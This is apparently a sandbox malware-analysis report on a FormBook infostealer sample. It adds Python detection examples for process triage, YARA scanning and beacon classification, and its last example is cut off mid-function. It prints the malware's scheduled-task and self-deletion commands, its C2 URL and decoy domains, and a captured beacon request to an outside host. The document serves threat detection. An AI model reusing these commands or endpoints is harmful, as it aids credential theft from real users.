

Windows Analysis Report Factura de proforma.exe

Overview

General Information

Sample Name: Factura de proforma.exe
Analysis ID: 502357
MD5: 16f7045eebb451234ca8078222c5994c
SHA1: 99e8f263f9e34ad13cb8cd6af1bb816deffb5bde
SHA256: ff344e635b268090aafdb8fa830e76c41f34d7cf9a9bf03ed4ede2705008bfef
Tags: ESP, exe, geo

Detection

FormBook
Score: 100 (range: 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • Factura de proforma.exe (PID: 6952 cmdline: 'C:\Users\user\Desktop\Factura de proforma.exe' MD5: 16F7045EEBB451234CA8078222C5994C)
    • schtasks.exe (PID: 6436 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tskpCbAwtxoaw' /XML 'C:\Users\user\AppData\Local\Temp\tmpD689.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 6388 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 4716 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 3408 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
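The tree above is the usual FormBook loader chain: the .NET dropper registers a scheduled task from an XML file in the user's Temp directory, starts RegSvcs.exe with no arguments and hollows it (the "process hollowing" and "creates a process in suspended mode" signatures), the hollowed RegSvcs.exe injects into explorer.exe, explorer.exe starts an argument-less 32-bit cscript.exe from SysWOW64, and that process removes the hollowed host's path with cmd.exe /c del. The Sigma rule listed further down fires on the argument-less RegSvcs.exe start. The following example, added here and not part of the Joe Sandbox report, transcribes the tree into process-creation events and runs three checks over them: an argument-less start of a known sacrificial host, a schtasks /Create whose /XML lives under AppData\Local\Temp, and a cmd.exe deletion of a file under C:\Windows. The host list, the cmd.exe image path (not shown in the tree) and the unknown parents of the root process and of explorer.exe are assumptions of the example.

```python
"""Triage of the process chain in this report, transcribed as constructed events."""
from dataclasses import dataclass
import ntpath
import re

# Hosts that do nothing useful when started without arguments; an argument-less
# start is the "sacrificial process" pattern of .NET loaders that hollow them.
# This list is the example's assumption, not the Sigma rule's exact selection.
SACRIFICIAL_HOSTS = {
    "regsvcs.exe", "regasm.exe", "msbuild.exe", "installutil.exe",
    "aspnet_compiler.exe", "applaunch.exe", "cscript.exe", "wscript.exe",
}

@dataclass
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_pid: int
    parent_image: str

@dataclass
class Finding:
    rule: str
    pid: int
    detail: str

def _name(path: str) -> str:
    return ntpath.basename(path.strip("'\"")).lower()

def _args(ev: ProcEvent) -> str:
    """Arguments after the image token (the report prints cmd.exe without its image token)."""
    m = re.match(r"""\s*('[^']*'|"[^"]*"|\S+)\s*(.*)$""", ev.cmdline)
    if m and _name(m.group(1)) == _name(ev.image):
        return m.group(2).strip()
    return ev.cmdline.strip()

SCHTASKS = re.compile(r"/create\b.*?/tn\s+'?([^'\s]+)'?.*?/xml\s+'?([^'\s]+)'?", re.I)
CMD_DEL = re.compile(r"/c\s+del\s+'?([^']+?)'?\s*$", re.I)

def check_sacrificial(ev: ProcEvent):
    name = _name(ev.image)
    if name in SACRIFICIAL_HOSTS and _args(ev) == "":
        return Finding("sacrificial_host_no_args", ev.pid,
                       f"{name} started with no arguments by {_name(ev.parent_image)} (pid {ev.parent_pid})")
    return None

def check_schtasks(ev: ProcEvent):
    if _name(ev.image) != "schtasks.exe":
        return None
    m = SCHTASKS.search(ev.cmdline)
    if m and "\\appdata\\local\\temp\\" in m.group(2).lower():
        return Finding("schtasks_xml_from_temp", ev.pid,
                       f"task {m.group(1)} registered from XML in user Temp: {m.group(2)}")
    return None

def check_self_delete(ev: ProcEvent):
    if _name(ev.image) != "cmd.exe":
        return None
    m = CMD_DEL.search(ev.cmdline)
    if m and m.group(1).lower().startswith("c:\\windows\\"):
        return Finding("self_delete_system_binary", ev.pid,
                       f"{_name(ev.parent_image)} (pid {ev.parent_pid}) deletes {m.group(1)} via cmd.exe")
    return None

CHECKS = (check_sacrificial, check_schtasks, check_self_delete)

def triage(events):
    return [f for ev in events for chk in CHECKS if (f := chk(ev)) is not None]

# Events transcribed from the process tree in this report. Parents marked 0 are not
# shown there; explorer.exe is nested under RegSvcs.exe because RegSvcs.exe injected
# into it, not because it started it. The cmd.exe image path is assumed.
EVENTS = [
    ProcEvent(6952, r"C:\Users\user\Desktop\Factura de proforma.exe",
              r"'C:\Users\user\Desktop\Factura de proforma.exe'", 0, ""),
    ProcEvent(6436, r"C:\Windows\System32\schtasks.exe",
              r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tskpCbAwtxoaw' /XML 'C:\Users\user\AppData\Local\Temp\tmpD689.tmp'",
              6952, r"C:\Users\user\Desktop\Factura de proforma.exe"),
    ProcEvent(6824, r"C:\Windows\system32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
              6436, r"C:\Windows\System32\schtasks.exe"),
    ProcEvent(6388, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
              6952, r"C:\Users\user\Desktop\Factura de proforma.exe"),
    ProcEvent(3352, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE", 0, ""),
    ProcEvent(4716, r"C:\Windows\SysWOW64\cscript.exe", r"C:\Windows\SysWOW64\cscript.exe",
              3352, r"C:\Windows\Explorer.EXE"),
    ProcEvent(3408, r"C:\Windows\SysWOW64\cmd.exe",
              r"/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'",
              4716, r"C:\Windows\SysWOW64\cscript.exe"),
    ProcEvent(6960, r"C:\Windows\system32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
              3408, r"C:\Windows\SysWOW64\cmd.exe"),
]

if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f"[{f.rule}] pid {f.pid}: {f.detail}")
```

Run against the transcribed tree this reports four findings: the task registration from Temp, the two argument-less host starts (RegSvcs.exe under the dropper, cscript.exe under explorer.exe) and the deletion of the RegSvcs.exe path. The conhost.exe children carry arguments and are ignored, as is explorer.exe, which is not a sacrificial host.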

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.thefanlounge.com/cb3b/"], "decoy": ["listenlocker.com", "jumpstartnotarybiz.com", "new-post-vehicle-site.xyz", "summon-entertainment.com", "johnandtracy-adopt.com", "bferety.info", "palmonlae.space", "yx1889.com", "janetnaufranck.com", "banditanalytics.com", "agenciahologram.com", "artemojo.com", "goldensuninn.com", "aminobalm.com", "customersme.com", "techcareerschool.com", "angelahuckeby.com", "smoothcontract.com", "kartsorgumerkezi.com", "houstonhemorrhoidclinic.com", "istanbuloz.com", "buyrealestatewithcarlos.com", "onlinelivehds.xyz", "outstandingearth.com", "cyclingsunglassestop.com", "haras-dors.com", "zhuanyekf.com", "pps-squad.com", "highlovely.com", "hudsonvalleymomandpopshop.com", "graytielaw.com", "orang-gilakali.com", "sajaasboutique.com", "nwomakrom.com", "mobilne-kucice.com", "instant-geek.com", "brewinginthenameof.com", "shopstel.net", "alumaber.com", "fernoost.info", "expandablepocketdeals.com", "ritelard.net", "elderyochanan.com", "gofante.online", "americansforbrazil.com", "condosofcolor.com", "the2gaku.com", "mesegeka.com", "democratsforesteban.com", "vinoporfavor.com", "xwaxxc1.com", "jinhongtextile.com", "festival-du-chanvre.com", "abrasivburada.com", "pinhoti.net", "nestd.online", "fendlercart.com", "unanox.com", "boyscout-site.com", "wlctrade.com", "gudesigns.net", "jandmisia.com", "funnyp0sts.com", "laveudelamare.com"]}

Yara Overview

Memory Dumps

Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp
  Rule: JoeSecurity_FormBook (Joe Security). Description: Yara detected FormBook
  Rule: Formbook_1 (Felix Bilstein - yara-signator at cocacoding dot com). Description: autogenerated rule brought to you by yara-signator. Strings:
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook (JPCERT/CC Incident Response Group). Description: detect Formbook in memory. Strings:
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp
  Rule: JoeSecurity_FormBook (Joe Security). Description: Yara detected FormBook
  Rule: Formbook_1 (Felix Bilstein - yara-signator at cocacoding dot com). Description: autogenerated rule brought to you by yara-signator. Strings:
    • 0x26b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x21a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x27b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x292f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x141c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x8927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x992a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
21 further memory-dump entries are not reproduced here.

      Unpacked PEs

Source: 6.2.RegSvcs.exe.400000.0.unpack
  Rule: JoeSecurity_FormBook (Joe Security). Description: Yara detected FormBook
  Rule: Formbook_1 (Felix Bilstein - yara-signator at cocacoding dot com). Description: autogenerated rule brought to you by yara-signator. Strings:
    • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook (JPCERT/CC Incident Response Group). Description: detect Formbook in memory. Strings:
    • 0x17a49:$sqlite3step: 68 34 1C 7B E1
    • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
    • 0x17a78:$sqlite3text: 68 38 2A 90 C5
    • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
    • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
Source: 0.2.Factura de proforma.exe.2bd16b0.1.raw.unpack
  Rule: JoeSecurity_AntiVM_3 (Joe Security). Description: Yara detected AntiVM_3
Source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack
  Rule: JoeSecurity_FormBook (Joe Security). Description: Yara detected FormBook
8 further unpacked-PE entries are not reproduced here.
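The two community rules above work differently: the yara-signator strings are short opcode sequences lifted from the payload's code (sequence_0, 03 C8 0F 31 2B C1 89 45 FC, is add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax, the timing check behind the "RDTSC time measurements" signature), while the JPCERT/CC strings are single push imm32 instructions whose immediates are the constants the payload pushes before resolving the sqlite3 routines the rule names. The example below, added here and not part of the report or of either rule's tooling, re-implements the memory scan for those strings in Python: it compiles YARA-style hex strings (including ?? byte and nibble wildcards) to byte regexes, reports hit offsets in the same shape as the Strings column above, evaluates an "N of them" condition, recovers the push constants, and flags which strings embed RDTSC. The buffer it scans is constructed, with the strings planted at known offsets, and the condition thresholds are assumptions rather than the rules' published conditions.

```python
"""YARA-style hex-string scanning over a constructed buffer (not a real memory dump)."""
import re
import struct

# Strings exactly as printed in the Yara Overview of this report.
FORMBOOK_1 = {  # Formbook_1, Felix Bilstein / yara-signator
    "sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
    "sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
    "sequence_2": "3B 4F 14 73 95 85 C9 74 91",
    "sequence_3": "3C 69 75 44 8B 7D 18 8B 0F",
    "sequence_4": "5D C3 8D 50 7C 80 FA 07",
    "sequence_5": "0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06",
    "sequence_6": "57 89 45 FC 89 45 F4 89 45 F8",
    "sequence_7": "66 89 0C 02 5B 8B E5 5D",
    "sequence_8": "3C 54 74 04 3C 74 75 F4",
    "sequence_9": "56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00",
}
JPCERT_FORMBOOK = {  # Formbook, JPCERT/CC Incident Response Group
    "sqlite3step": "68 34 1C 7B E1",
    "sqlite3text": "68 38 2A 90 C5",
    "sqlite3blob": "68 53 D8 7F 8C",
}

def compile_hex(pattern: str):
    """Translate a YARA hex string such as '68 ?? 1C 7? E1' into a bytes regex."""
    out = []
    for tok in pattern.split():
        if len(tok) != 2:
            raise ValueError(f"bad hex token {tok!r}")
        if tok == "??":
            out.append(b".")
        elif "?" in tok:  # nibble wildcard: enumerate the bytes it admits
            hi, lo = tok
            cands = [b for b in range(256)
                     if (hi == "?" or b >> 4 == int(hi, 16))
                     and (lo == "?" or b & 0xF == int(lo, 16))]
            out.append(b"[" + b"".join(b"\\x%02x" % c for c in cands) + b"]")
        else:
            out.append(b"\\x%02x" % int(tok, 16))
    return re.compile(b"".join(out), re.DOTALL)

def scan(buf: bytes, strings: dict) -> dict:
    """Offsets of every string, keyed by name (the shape of the report's Strings column)."""
    return {name: [m.start() for m in compile_hex(pat).finditer(buf)]
            for name, pat in strings.items()}

def rule_matches(buf: bytes, strings: dict, minimum=None) -> bool:
    """'minimum of them' condition; None means 'all of them'. Thresholds are assumed here."""
    hits = sum(1 for offs in scan(buf, strings).values() if offs)
    return hits >= (len(strings) if minimum is None else minimum)

def push_immediates(strings: dict) -> dict:
    """For strings that are one 'push imm32' (68 xx xx xx xx), recover the constant."""
    out = {}
    for name, pat in strings.items():
        raw = bytes.fromhex(pat)
        if len(raw) == 5 and raw[0] == 0x68:
            out[name] = struct.unpack("<I", raw[1:])[0]
    return out

def uses_rdtsc(pattern: str) -> bool:
    """True if the string embeds the two-byte RDTSC opcode 0F 31."""
    return b"\x0f\x31" in bytes.fromhex(pattern)

def build_sample() -> bytes:
    """Constructed 1 KiB buffer: NOP filler with the report's strings planted at known offsets."""
    buf = bytearray(b"\x90" * 0x400)
    layout = [(0x040, JPCERT_FORMBOOK["sqlite3step"]), (0x060, JPCERT_FORMBOOK["sqlite3text"]),
              (0x080, JPCERT_FORMBOOK["sqlite3blob"]), (0x1C0, JPCERT_FORMBOOK["sqlite3step"])]
    layout += [(0x200 + 0x20 * i, pat) for i, pat in enumerate(FORMBOOK_1.values())]
    for off, pat in layout:
        raw = bytes.fromhex(pat)
        buf[off:off + len(raw)] = raw
    return bytes(buf)

if __name__ == "__main__":
    sample = build_sample()
    for name, offs in scan(sample, {**FORMBOOK_1, **JPCERT_FORMBOOK}).items():
        print(f"{name:12s} {[hex(o) for o in offs]}")
    print("Formbook_1 (7 of them):", rule_matches(sample, FORMBOOK_1, 7))
    print("JPCERT Formbook (all of them):", rule_matches(sample, JPCERT_FORMBOOK))
    print("push constants:", {k: hex(v) for k, v in push_immediates(JPCERT_FORMBOOK).items()})
```

The recovered constants (0xE17B1C34, 0xC5902A38, 0x8C7FD853) are what to pivot on when a dump is only partially intact: a wildcarded pattern such as "68 ?? ?? 7B E1" still finds the sqlite3step push even if a byte in the middle was patched.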

            Sigma Overview

            System Summary:

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Source: Process started. Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard. Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\Factura de proforma.exe', ParentImage: C:\Users\user\Desktop\Factura de proforma.exe, ParentProcessId: 6952, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6388
Sigma detected: Possible Applocker Bypass
Source: Process started. Author: juju4. Data: the same process-start event as above (RegSvcs.exe, ProcessId 6388, started by 'C:\Users\user\Desktop\Factura de proforma.exe', ParentProcessId 6952)

            Jbx Signature Overview


            AV Detection:

Found malware configuration
Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Yara detected FormBook
Source: Yara match, file source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORY
Source: 6.2.RegSvcs.exe.400000.0.unpack, Avira label: TR/Crypt.ZPACK.Gen
Source: Factura de proforma.exe, static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Factura de proforma.exe, static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cscript.pdbUGP, source: RegSvcs.exe, 00000006.00000002.406155784.00000000036A0000.00000040.00020000.sdmp
Source: Binary string: RegSvcs.pdb, source: cscript.exe, 0000000A.00000002.573045416.0000000004CEF000.00000004.00020000.sdmp
Source: Binary string: wntdll.pdbUGP, source: RegSvcs.exe, 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp; cscript.exe, 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb, source: RegSvcs.exe, cscript.exe
Source: Binary string: RegSvcs.pdb, source: cscript.exe, 0000000A.00000002.573045416.0000000004CEF000.00000004.00020000.sdmp
Source: Binary string: cscript.pdb, source: RegSvcs.exe, 00000006.00000002.406155784.00000000036A0000.00000040.00020000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, code function: 4x nop then pop edi

            Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, domain query: www.aminobalm.com
Source: C:\Windows\explorer.exe, domain query: www.palmonlae.space
Source: C:\Windows\explorer.exe, network connect: 13.209.99.177 80
Performs DNS queries to domains with low reputation
Source: DNS query: www.new-post-vehicle-site.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.thefanlounge.com/cb3b/
Source: Joe Sandbox View, ASN name: AMAZON-02US AMAZON-02US
Source: global traffic, HTTP traffic detected: GET /cb3b/?c6=kr386M7znJup/B2j4KhdpwCgkxfUSLFq19BV4h8BDsMel0JC//DVwypubzBUvp11Q9BD&A0DXb=eZk4rh9h HTTP/1.1, Host: www.aminobalm.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Strings found in binary or memory of Factura de proforma.exe (process 0). Apart from the xmlsoap.org and collada.org schema identifiers, these are font-vendor URLs of the kind found in the name tables of Windows' bundled fonts once a .NET process has initialised font handling; none of these hosts appears in the traffic captured in this report.
Source: 00000000.00000003.299841120.0000000000D0D000.00000004.00000001.sdmp: http://en.w
Source: 00000000.00000003.301130424.0000000005AEB000.00000004.00000001.sdmp and 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp: http://fontfabrik.com
Source: 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmp: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name, http://www.collada.org/2005/11/COLLADASchema9Done
Source: 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp: http://www.apache.org/licenses/LICENSE-2.0, http://www.carterandcone.coml, http://www.fontbureau.com, http://www.fontbureau.com/designers, http://www.fontbureau.com/designers/?, http://www.fontbureau.com/designers/cabarga.htmlN, http://www.fontbureau.com/designers/frere-jones.html, http://www.fontbureau.com/designers?, http://www.fontbureau.com/designersG, http://www.founder.com.cn/cn/bThe, http://www.founder.com.cn/cn/cThe, http://www.galapagosdesign.com/DPlease, http://www.galapagosdesign.com/staff/dennis.htm, http://www.goodfont.co.kr, http://www.jiyu-kobo.co.jp/, http://www.sakkal.com, http://www.tiro.com, http://www.typography.netD, http://www.urwpp.deDPlease, http://www.zhongyicts.com.cn
Source: 00000000.00000003.307837879.0000000005ADD000.00000004.00000001.sdmp and 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp: http://www.fontbureau.com/designers8
Source: 00000000.00000003.307837879.0000000005ADD000.00000004.00000001.sdmp: http://www.fontbureau.com/designerskSHU
Source: 00000000.00000003.300605422.0000000005AEB000.00000004.00000001.sdmp: http://www.fonts.com, http://www.fonts.com-uT, http://www.fonts.comc, http://www.fonts.comn
Source: 00000000.00000003.304081072.0000000005AD4000.00000004.00000001.sdmp: http://www.founder.com.cn/cn
Source: 00000000.00000003.304064871.0000000005B0D000.00000004.00000001.sdmp: http://www.founder.com.cn/cn.U, http://www.founder.com.cn/cn2U%
Source: 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmp: http://www.jiyu-kobo.co.jp/7D, http://www.jiyu-kobo.co.jp/JD, http://www.jiyu-kobo.co.jp/XDiUa, http://www.jiyu-kobo.co.jp/a-eoDFU$, http://www.jiyu-kobo.co.jp/jp/, http://www.jiyu-kobo.co.jp/ko, http://www.jiyu-kobo.co.jp/t, http://www.jiyu-kobo.co.jp/tDMU
Source: 00000000.00000003.300417307.0000000005AEB000.00000004.00000001.sdmp and 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp: http://www.sajatypeworks.com
Source: 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp and 00000000.00000003.303541923.0000000005AD9000.00000004.00000001.sdmp: http://www.sandoll.co.kr
Source: 00000000.00000003.303541923.0000000005AD9000.00000004.00000001.sdmp: http://www.sandoll.co.krN.TTFs
Source: 00000000.00000003.301130424.0000000005AEB000.00000004.00000001.sdmp: http://www.tiro.comF
Source: cscript.exe, 0000000A.00000002.573092724.00000000051DF000.00000004.00020000.sdmp, string found in binary or memory: https://www.dotname.co.kr/customer/event/2019/20190604_landing_dotname?c6=kr386M7znJup/B2j4KhdpwCgkx
Source: unknown, DNS traffic detected: queries for: www.palmonlae.space
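The configuration and the traffic above fit together: FormBook carries one real C2 (www.thefanlounge.com/cb3b/) plus a list of decoy domains, and it sends the same request, same URI path, same two-parameter query shape, to decoys and C2 alike, so the captured GET /cb3b/ to www.aminobalm.com (a decoy, with "www." prepended) and the explorer.exe lookups of www.palmonlae.space and www.new-post-vehicle-site.xyz (both decoys) are all the beacon rotation, not unrelated browsing. The example below, added here and not part of the report or of any FormBook tooling, loads the extracted configuration, derives the C2 path and decoy set from it, parses raw HTTP requests and scores them. The captured request is reconstructed from the report's summarised capture; the three control requests, the scoring weights and the verdict thresholds are this example's assumptions.

```python
"""Classify HTTP requests against the FormBook configuration extracted in this report."""
import json
from urllib.parse import urlsplit, parse_qs

# Configuration exactly as printed under "Malware Configuration" above.
CONFIG = json.loads(r'''{"C2 list": ["www.thefanlounge.com/cb3b/"], "decoy": ["listenlocker.com",
"jumpstartnotarybiz.com", "new-post-vehicle-site.xyz", "summon-entertainment.com", "johnandtracy-adopt.com",
"bferety.info", "palmonlae.space", "yx1889.com", "janetnaufranck.com", "banditanalytics.com",
"agenciahologram.com", "artemojo.com", "goldensuninn.com", "aminobalm.com", "customersme.com",
"techcareerschool.com", "angelahuckeby.com", "smoothcontract.com", "kartsorgumerkezi.com",
"houstonhemorrhoidclinic.com", "istanbuloz.com", "buyrealestatewithcarlos.com", "onlinelivehds.xyz",
"outstandingearth.com", "cyclingsunglassestop.com", "haras-dors.com", "zhuanyekf.com", "pps-squad.com",
"highlovely.com", "hudsonvalleymomandpopshop.com", "graytielaw.com", "orang-gilakali.com", "sajaasboutique.com",
"nwomakrom.com", "mobilne-kucice.com", "instant-geek.com", "brewinginthenameof.com", "shopstel.net",
"alumaber.com", "fernoost.info", "expandablepocketdeals.com", "ritelard.net", "elderyochanan.com",
"gofante.online", "americansforbrazil.com", "condosofcolor.com", "the2gaku.com", "mesegeka.com",
"democratsforesteban.com", "vinoporfavor.com", "xwaxxc1.com", "jinhongtextile.com", "festival-du-chanvre.com",
"abrasivburada.com", "pinhoti.net", "nestd.online", "fendlercart.com", "unanox.com", "boyscout-site.com",
"wlctrade.com", "gudesigns.net", "jandmisia.com", "funnyp0sts.com", "laveudelamare.com"]}''')

def _bare(host: str) -> str:
    """Normalise a host: lower-case, no trailing dot, no 'www.' (the beacon adds one to decoys)."""
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host

def load_config(cfg: dict) -> dict:
    c2 = []
    for entry in cfg["C2 list"]:
        host, _, path = entry.partition("/")
        c2.append((_bare(host), "/" + path))
    return {"c2": c2, "decoys": {_bare(d) for d in cfg["decoy"]}}

def parse_request(raw: bytes) -> dict:
    """Minimal HTTP/1.x request parser: request line, headers (lower-cased), body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
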